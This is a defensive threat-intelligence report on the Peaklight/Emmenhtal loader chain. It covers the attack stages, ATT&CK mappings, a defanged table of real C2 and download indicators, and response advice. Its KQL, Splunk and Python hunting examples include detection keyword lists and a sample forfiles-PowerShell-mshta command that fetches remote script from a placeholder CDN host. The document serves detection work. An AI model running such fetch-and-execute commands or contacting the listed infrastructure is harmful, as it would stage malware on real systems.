Peaklight malware: Stealthy memory-resident delivery chain abusing LNK, mshta, CDN and WebDAV



1. Executive Summary

Peaklight (also tracked as PEAKLIGHT by Mandiant) is best understood as the PowerShell downloader stage within a broader, multi-stage loader ecosystem that often begins with malicious Windows Shortcut (LNK) files masquerading as media or document content. In Mandiant’s reporting, the infection chain uses mshta.exe as a signed-binary proxy to execute remote script content hosted on a CDN, followed by heavily obfuscated JavaScript and PowerShell that ultimately delivers commodity payloads such as LUMMAC.V2 (Lumma Stealer), CRYPTBOT, and SHADOWLADDER. (Google Cloud)

Multiple independent research teams connect this activity to the Emmenhtal loader family (also referred to as PEAKLIGHT in some contexts), highlighting a crimeware-style ecosystem used by multiple financially motivated actors and, in later campaigns, activity consistent with malware-as-a-service or infrastructure-as-a-service models. (orangecyberdefense.com)


2. Contextual Background

2.1 Nature of the threat

What is “Peaklight”?

  • In Mandiant’s public analysis, PEAKLIGHT is the obfuscated PowerShell-based downloader that checks for ZIP archives in hard-coded paths and, if missing, pulls archives from a CDN and writes them to disk before extracting and chaining into additional payload execution. (Google Cloud)
  • In parallel reporting, Orange Cyberdefense tracks a closely aligned multi-stage loader it dubbed Emmenhtal, involving HTA, JavaScript, and PowerShell layers, with some variants distributed via ZIP archives containing LNKs and others via WebDAV-hosted LNKs. (orangecyberdefense.com)
  • Sekoia.io explicitly states that Emmenhtal is also known as PeakLight, and documents WebDAV-backed distribution infrastructure used to host weaponised LNK files that invoke mshta.exe. (Sekoia.io Blog)

Key takeaway: Peaklight is not a single “fileless stealer” but a delivery chain where early stages can execute in memory and evade disk-based controls, while later stages commonly download archives/payloads and execute commodity malware. (Google Cloud)

2.2 Threat-actor attribution

No reputable public source conclusively attributes Peaklight/Emmenhtal to a single named threat actor. Orange Cyberdefense assesses the loader is highly likely used by multiple financially motivated threat actors (Admiralty/NATO-style confidence: Likely) based on the variety of distribution clusters and payloads observed. (orangecyberdefense.com)

Sekoia.io further supports a shared-service hypothesis, suggesting the supporting WebDAV infrastructure may be offered “as-a-service” to multiple actors due to payload diversity and repeated “test” artefacts. Confidence: Possible (hypothesis explicitly presented as such). (Sekoia.io Blog)

2.3 Sector and geographic targeting

Observed targeting is broad and opportunistic, consistent with crimeware distribution:

  • Orange Cyberdefense reports incidents affecting clients in France and describes multiple clusters with inferred targeting signals including Russia, South Africa, Malaysia, and North America, derived from infrastructure geolocation and lure language/filenames. (orangecyberdefense.com)
  • Later reporting by Talos links Emmenhtal use to phishing activity appearing to target Ukrainian entities (billing/invoice-themed lures). (Cisco Talos Blog)

3. Technical Analysis

3.1 Attack chain and observed TTPs (with MITRE ATT&CK mapping)

This section synthesises the most repeatable elements described by Mandiant, Orange Cyberdefense, and Sekoia.io.

Stage 0: Initial access and lure delivery

Common entry points include:

  • Malicious ZIP archives containing LNK files (often disguised as video content). (orangecyberdefense.com)
  • WebDAV-hosted LNK delivery, sometimes preceded by browser redirection that opens an Explorer window pointing at the remote WebDAV share. (orangecyberdefense.com)

MITRE mapping:

  • User execution of malicious shortcuts: T1204.002
  • Masquerading (lures presented as videos/docs): T1036 (behaviour described across sources)

Stage 1: LNK execution and “living off the land” bootstrap

Mandiant observed LNK parameters that:

  • Use forfiles.exe to trigger PowerShell and then invoke mshta.exe to execute remote content from Bunny CDN subdomains. (Google Cloud)
  • In another variation, use PowerShell wildcards and registry querying to resolve mshta execution more stealthily before retrieving remote payload content. (Google Cloud)

MITRE mapping:

  • Windows Command Shell (forfiles.exe bootstrap): T1059.003
  • PowerShell: T1059.001
  • Signed Binary Proxy Execution: Mshta: T1218.005

Stage 2: Remote script retrieval via CDN and in-memory JavaScript dropper

Mandiant describes a cached/hosted obfuscated JavaScript dropper on CDN infrastructure, using decimal-encoded ASCII and runtime decoding to reveal embedded payload logic. (Google Cloud)

MITRE mapping:

  • Obfuscated files or information: T1027
  • Ingress tool transfer (download of staged content): T1105
  • Use of web protocols: T1071.001

Stage 3: PEAKLIGHT downloader retrieves archives and chains payload execution

Mandiant’s PEAKLIGHT stage:

  • Checks for specific ZIP archives in hard-coded locations, downloads them if missing, writes to disk, and extracts. (Google Cloud)
  • Delivers and enables execution of payloads including LUMMAC.V2, CRYPTBOT, and SHADOWLADDER. (Google Cloud)
  • Includes a “cover” behaviour: after LNK execution, a benign-looking video may play to reduce user suspicion. (Google Cloud)

MITRE mapping:

  • Ingress tool transfer: T1105
  • Defence evasion via cover content (inferred from described cover video): T1036 (behavioural inference)

Stage 4: Side-loading and follow-on execution patterns

In one Mandiant-described variation:

  • A renamed legitimate executable loads a malicious DLL (side-loading), and built-in utilities are used to drop additional components associated with payload execution. (Google Cloud)

MITRE mapping:

  • DLL search order hijacking / side-loading: T1574.001 (supported by the described “legitimate EXE loads malicious DLL” pattern)

Payload ecosystem notes

Several sources highlight overlapping naming around SHADOWLADDER and Hijack Loader:

  • SCWorld summarises Mandiant’s reporting that PEAKLIGHT enables retrieval of Hijack Loader, also referred to as SHADOWLADDER (and other aliases), alongside Lumma and CryptBot. (SC Media)

3.2 Exploitation status and PoCs

Active use:

  • Orange Cyberdefense reported some campaigns were still active as of their analysis cut-off (7 August 2024) and described an ongoing iteration beginning mid-July 2024. (orangecyberdefense.com)
  • Subsequent reporting through 2025 indicates continued evolution and reuse of Emmenhtal/PEAKLIGHT components in additional campaigns, including those involving SmokeLoader and MaaS-style distribution. (Cisco Talos Blog)

CVE exploitation

In the core public technical write-ups by Mandiant, Orange Cyberdefense, and Sekoia.io that describe Peaklight/Emmenhtal infection chains, no CVE-dependent exploitation is required to execute the described LNK → mshta → script chain. (Google Cloud)

Well-known Office-related RCE vectors:

4. Impact Assessment

4.1 Severity and scope

Peaklight’s practical risk is driven by two factors:

  1. Stealth and evasion: early script stages may execute in memory, and the chain heavily relies on trusted Windows binaries (notably mshta) and reputable infrastructure (CDN), complicating simple blocklists and basic static file scanning. (Google Cloud)
  2. Downstream payload impact: delivered payloads include information stealers (credential, browser session, and financial data theft) and loaders that can enable further compromise. Mandiant explicitly observed Lumma, CryptBot, and SHADOWLADDER delivered via this chain. (Google Cloud)

Because this is malware and not a single vulnerability, CVSS scoring is not applicable to Peaklight itself. Risk prioritisation should be based on exposure to user-executed lures (downloads, phishing), control strength around PowerShell/mshta, and the business impact of credential theft.

4.2 Victim profile

Public reporting indicates:

  • Windows endpoints are the primary target platform. (Google Cloud)
  • Victims range from general organisations (opportunistic “fake video” lures) to geographically inferred targeting clusters (including Ukraine-linked phishing activity in 2025 reporting). (orangecyberdefense.com)

5. Indicators of Compromise (IOCs)

5.1 IOC table

Note: Values are shown in an intentionally non-clickable, defanged format (hxxp/hxxps and [.]).

Type | Value | Context/Notes | Source
URL | hxxps://nextomax.b-cdn[.]net/nexto | CDN-hosted stage referenced in LNK variation | Mandiant PEAKLIGHT analysis (Google Cloud)
URL | hxxps://potexo.b-cdn[.]net/potexo | CDN-hosted stage referenced in LNK variation | Mandiant PEAKLIGHT analysis (Google Cloud)
URL | hxxps://fatodex.b-cdn[.]net/fatodex | Network-based IOC listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxps://matodown.b-cdn[.]net/matodown | Network-based IOC listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxps://potexo.b-cdn[.]net/potexo | Network-based IOC listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk | WebDAV directory and LNK retrieval example | Mandiant PEAKLIGHT analysis (Google Cloud)
Domain | streamvideoz.b-cdn[.]net | Cluster indicator reported by Orange Cyberdefense | Orange Cyberdefense Emmenhtal report (orangecyberdefense.com)
Domain | nextomax.b-cdn[.]net | Cluster indicator reported by Orange Cyberdefense | Orange Cyberdefense Emmenhtal report (orangecyberdefense.com)
Domain | matodown.b-cdn[.]net | Cluster indicator reported by Orange Cyberdefense | Orange Cyberdefense Emmenhtal report (orangecyberdefense.com)
Domain | fatodex.b-cdn[.]net | Cluster indicator reported by Orange Cyberdefense | Orange Cyberdefense Emmenhtal report (orangecyberdefense.com)
Domain | relaxtionflouwerwi[.]shop | Lumma C2 domain listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
Domain | messtimetabledkolvk[.]shop | Lumma C2 domain listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxp://gceight8vt[.]top/upload.php | CryptBot C2 path listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxps://brewdogebar[.]com/code.vue | CryptBot C2 path listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxps://fatodex.b-cdn[.]net/K1.zip | Shadowladder-related download listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
URL | hxxps://fatodex.b-cdn[.]net/K2.zip | Shadowladder-related download listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
File (MD5) | 62f20122a70c0f86a98ff14e84bcc999 | LNK sample hash (Full Video HD (1080p).lnk) | Mandiant PEAKLIGHT analysis (Google Cloud)
File (MD5) | 91423dd4f34f759aaf82aa73fa202120 | Cover “video.mp4” hash referenced by Mandiant | Mandiant PEAKLIGHT analysis (Google Cloud)
File (MD5) | 95361f5f264e58d6ca4538e7b436ab67 | PEAKLIGHT downloader hash listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
File (MD5) | b716a1d24c05c6adee11ca7388b728d3 | PEAKLIGHT downloader hash listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
File (MD5) | 58c4ba9385139785e9700898cb097538 | WebView2Loader.dll hash listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
File (MD5) | 43939986a671821203bf9b6ba52a51b4 | Lumma payload file hash listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
File (MD5) | d6ea5dcdb2f88a65399f87809f43f83c | CryptBot-associated file hash listed by Mandiant | Mandiant PEAKLIGHT IOCs (Google Cloud)
IP | 91[.]92[.]251[.]35 | Example WebDAV-hosted LNK infrastructure observed by Sekoia.io | Sekoia.io WebDAV infrastructure report (Sekoia.io Blog)
IP | 206[.]188[.]196[.]28 | Example WebDAV-hosted LNK infrastructure observed by Sekoia.io | Sekoia.io WebDAV infrastructure report (Sekoia.io Blog)

5.2 Detection guidance

Vendor and community detection content

Practical behavioural hunts (examples)

Use these as templates (adapt fields to your EDR/SIEM):

Windows process creation hunt (high-signal)

  • forfiles.exe spawning PowerShell with dot-sourcing and mshta
  • PowerShell spawning mshta.exe with remote hxxp(s) URLs
  • mshta.exe reaching out to unusual CDN subdomains followed by script-heavy child processes

Example KQL (Microsoft Defender / Sentinel style):

DeviceProcessEvents
| where FileName in~ ("forfiles.exe","powershell.exe","mshta.exe")
| where ProcessCommandLine has_any ("mshta", ".b-cdn", "Expand-Archive", "DownloadData", "SecurityProtocolType")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc
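The same hunt expressed as a script over endpoint telemetry, as an added example that is not code from the report or from any of the cited vendors. It runs over constructed Sysmon Event ID 1-style records (field names shortened), keys on the same command-line fragments as the KQL, and raises the severity when one of the three binaries spawns another with a remote URL on the command line, which is the Stage 1 bootstrap pattern; the CDN subdomain in the sample is a placeholder, not a real indicator.

```python
# Added example (not from the report or any cited vendor): process-creation hunt
# mirroring the KQL above, run over constructed Sysmon Event ID 1-style records.
import re

SUSPECT_IMAGES = {"forfiles.exe", "powershell.exe", "mshta.exe"}
# Command-line fragments from the KQL hunt, matched case-insensitively.
CMDLINE_MARKERS = ("mshta", ".b-cdn", "expand-archive", "downloaddata", "securityprotocoltype")
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)

# Constructed sample telemetry; the CDN subdomain is a placeholder, not a real IOC.
STAGE_URL = "https://constructed-sample.b-cdn.net/stage"
SAMPLE_EVENTS = [
    {"ts": "2024-08-01T10:00:05Z", "host": "WS01", "image": r"C:\Windows\System32\forfiles.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f'forfiles.exe /c "powershell . mshta {STAGE_URL}"'},
    {"ts": "2024-08-01T10:00:06Z", "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": f"powershell . mshta {STAGE_URL}"},
    {"ts": "2024-08-01T10:00:07Z", "host": "WS01", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"mshta {STAGE_URL}"},
    # Benign admin activity the marker list still catches: expect this kind of triage noise.
    {"ts": "2024-08-01T10:30:00Z", "host": "WS02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell Expand-Archive -Path C:\pkg\tools.zip -DestinationPath C:\tools"},
]

def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (severity, matched markers) for one record, or None if not of interest."""
    image = basename(ev["image"])
    if image not in SUSPECT_IMAGES:
        return None
    cmd = ev["cmdline"].lower()
    markers = [m for m in CMDLINE_MARKERS if m in cmd]
    if not markers:
        return None
    parent = basename(ev["parent_image"])
    # High signal: one of the three LOLBins spawning another, with a remote URL on the
    # command line (the forfiles -> powershell -> mshta bootstrap from Stage 1).
    chained = parent in SUSPECT_IMAGES and parent != image
    if chained and REMOTE_URL.search(cmd):
        return "high", markers
    return "medium", markers

def hunt(events):
    """Project matching events as the KQL does, adding a severity for triage order."""
    findings = []
    for ev in events:
        scored = score_event(ev)
        if scored:
            findings.append({"ts": ev["ts"], "host": ev["host"], "image": basename(ev["image"]),
                             "parent": basename(ev["parent_image"]),
                             "severity": scored[0], "markers": scored[1]})
    return findings
```

Sorting the findings by timestamp descending and printing them reproduces the KQL's output; the "medium" hit on WS02 shows why the marker list alone needs the parent/child check to rank results.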

WebDAV indicator hunt

  • Outbound connections to hosts serving /Downloads/ and immediate retrieval of .lnk
  • Explorer opening remote file shares that then lead to shortcut execution

Example Splunk (proxy + endpoint correlation concept):

(index=proxy OR index=network) uri_path="*/Downloads/*" (uri_path="*.lnk" OR uri_path="*/Downloads/")
| stats count values(dest) values(url) by src
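The proxy-side correlation behind that Splunk search, as an added example that is not code from the report or any cited vendor. It parses constructed proxy log lines (timestamp, client, method, URL) and reports each client/host pair where a directory listing under /Downloads/ is followed within a short window by a .lnk fetched from under the same path on the same host; the 203.0.113.10 address is from the documentation range and is not a real indicator, and PROPFIND is shown because it is the WebDAV method a listing produces, which the page's Splunk search does not key on.

```python
# Added example (not from the report or any cited vendor): correlate a WebDAV
# /Downloads/ listing with a follow-up .lnk retrieval from the same client.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Constructed proxy log (timestamp, client, method, URL); 203.0.113.10 is a
# documentation-range address, not a real IOC. PROPFIND is the WebDAV listing method.
SAMPLE_PROXY_LOG = """\
2024-08-01T10:00:03Z 10.0.0.15 PROPFIND http://203.0.113.10/Downloads/
2024-08-01T10:00:04Z 10.0.0.15 GET http://203.0.113.10/Downloads/Full%20Video%20HD%20(1080p).lnk
2024-08-01T10:05:00Z 10.0.0.22 GET https://intranet.example.com/Downloads/report.pdf
2024-08-01T11:00:00Z 10.0.0.31 GET http://203.0.113.10/Downloads/
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def parse_line(line):
    """Split one log line into its fields, decoding %20 and friends in the path."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    url = urlsplit(m.group(4))
    return {"ts": ts, "src": m.group(2), "method": m.group(3).upper(),
            "host": url.hostname, "path": unquote(url.path)}

def hunt_webdav_lnk(log_text, window=timedelta(minutes=5)):
    """One finding per (client, host) where a /Downloads/ listing is followed within
    `window` by a .lnk fetched from under /Downloads/ on the same host."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            req = parse_line(line)
            by_pair[(req["src"], req["host"])].append(req)
    findings = []
    for (src, host), reqs in by_pair.items():
        reqs.sort(key=lambda r: r["ts"])
        listings = [r for r in reqs if r["path"].lower().endswith("/downloads/")]
        lnks = [r for r in reqs
                if "/downloads/" in r["path"].lower() and r["path"].lower().endswith(".lnk")]
        for listing in listings:
            hits = [l for l in lnks if timedelta(0) <= l["ts"] - listing["ts"] <= window]
            if hits:  # a lone listing (10.0.0.31 above) is not reported on its own
                findings.append({"src": src, "host": host, "listing_method": listing["method"],
                                 "lnk": hits[0]["path"],
                                 "seconds_apart": int((hits[0]["ts"] - listing["ts"]).total_seconds())})
    return findings
```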

6. Incident Response Guidance

6.1 Containment, eradication, and recovery

  1. Isolate affected endpoints quickly (network containment), because downstream payloads include stealers and loaders with high likelihood of credential theft.
  2. Reset credentials and session tokens for users of affected hosts, prioritising browsers, email, VPN, and SaaS accounts. Consider forced re-authentication if you suspect cookie/session theft.
  3. Block and sinkhole known indicators from reputable sources (start with Mandiant-published IOCs; augment with internal telemetry). (Google Cloud)
  4. Hunt laterally for “follow-on” execution patterns, especially scheduled tasks or abnormal persistence mechanisms introduced by secondary loaders (varies by payload; do not assume a single persistence pattern).

6.2 Forensic artefacts to collect and preserve

Because early stages may be memory-resident or short-lived:

  • Memory capture (where policy permits) and EDR process telemetry around powershell.exe, mshta.exe, and suspicious child processes.
  • PowerShell logs (Script Block Logging, Module Logging) and AMSI events if enabled.
  • Sysmon (Event IDs 1, 3, 7, 11) or equivalent EDR records for process/network/module load.
  • Downloads and Temp directories, including extracted ZIPs and any renamed “legitimate” executables used for side-loading. (Google Cloud)
  • Proxy/DNS logs for Bunny CDN subdomains and WebDAV endpoints.

6.3 Lessons learned and preventive recommendations

  • Treat mshta.exe and script interpreters as high-risk utilities in user workstations, and reduce where operationally possible.
  • Tighten controls around “user downloaded executable content” and LNK execution from user-writeable paths.

7. Threat Intelligence Contextualisation

7.1 Similar incidents and ecosystem overlap

Peaklight aligns with a wider trend: multi-stage loaders that blend social engineering, reputable web services, and living-off-the-land binaries to deliver credential theft at scale.

  • Orange Cyberdefense documents Emmenhtal as a multistage downloader used across numerous clusters since early 2024. (orangecyberdefense.com)
  • Sekoia.io’s “WebDAV-as-a-Service” reporting expands the picture into shared distribution infrastructure used for multiple malware families, reinforcing a service model hypothesis. (Sekoia.io Blog)
  • Talos later describes MaaS-style operations using Emmenhtal components and public GitHub repositories for staging payloads, indicating continued professionalisation of the ecosystem. (Cisco Talos Blog)

7.2 Full MITRE ATT&CK mapping table (observed or directly supported behaviours)

Tactic | Technique ID | Technique Name | Observed behaviour
Initial Access | T1204.002 | User Execution: Malicious File | Users execute LNK masquerading as video/document content. (Google Cloud)
Execution | T1059.003 | Windows Command Shell | LNK uses forfiles.exe to launch scripted execution flow. (Google Cloud)
Execution | T1059.001 | PowerShell | PowerShell used extensively for downloader and decryption stages. (Google Cloud)
Defence Evasion | T1218.005 | Signed Binary Proxy Execution: Mshta | mshta.exe used to execute remote script content. (Google Cloud)
Defence Evasion | T1027 | Obfuscated Files or Information | Multi-layer obfuscation in JavaScript and PowerShell stages. (Google Cloud)
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP/HTTPS retrieval of staged content and payloads. (Google Cloud)
Command and Control | T1105 | Ingress Tool Transfer | Downloader retrieves ZIP archives and additional components. (Google Cloud)
Privilege Escalation / Defence Evasion | T1574.001 | DLL Search Order Hijacking | Legitimate executable loads malicious DLL (side-loading pattern). (Google Cloud)

8. Mitigation Recommendations

8.1 Hardening and configuration

  • Constrain or block mshta.exe where business impact allows (WDAC, AppLocker, or EDR policy). Prioritise user workstations and non-developer endpoints.
  • Reduce PowerShell abuse: enable Script Block Logging, enforce Constrained Language Mode where feasible, and monitor for dot-sourcing and encoded commands.
  • Mark-of-the-Web enforcement and archive handling: treat downloaded archives containing LNK as high-risk; consider blocking or warning on LNK execution from user writeable directories (Downloads, Temp).
  • Web filtering: explicitly monitor and, if appropriate, restrict access to suspicious Bunny CDN subdomains used in campaigns (balance with false positives).

8.2 Patch management advice

Peaklight’s core chain as described does not rely on a specific unpatched vulnerability; it relies on user execution and built-in tooling. Patch prioritisation should instead focus on:


9. Historical Context & Related Vulnerabilities

9.1 Previously exploited techniques in the same ecosystem

The Emmenhtal/Peaklight ecosystem reflects persistent attacker preference for:

  • Script-heavy, multi-layer loaders (HTA/JS/PowerShell) embedded in or appended to legitimate binaries. (orangecyberdefense.com)
  • WebDAV and CDN abuse to host first-stage artefacts and reduce takedown friction. (Sekoia.io Blog)

9.2 Related coverage


10. Future Outlook

Peaklight and the wider Emmenhtal loader family show the characteristics defenders should expect from commodity loader evolution:

  • Broader distribution partnerships: Sekoia.io’s infrastructure observations and Talos’s MaaS reporting indicate shared services and modular payload delivery are likely to increase. (Sekoia.io Blog)
  • More trusted-host abuse: CDNs, code hosting, and common enterprise web services remain attractive staging points because organisations often cannot block them outright. (Cisco Talos Blog)
  • Shift from “fileless” marketing to hybrid reality: memory-resident stages will continue, but many campaigns will still drop archives, DLLs, or side-loading components when that improves reliability and payload success rates. (Google Cloud)

11. Further Reading

Primary technical analyses

Ecosystem evolution

Vulnerability references (contextual)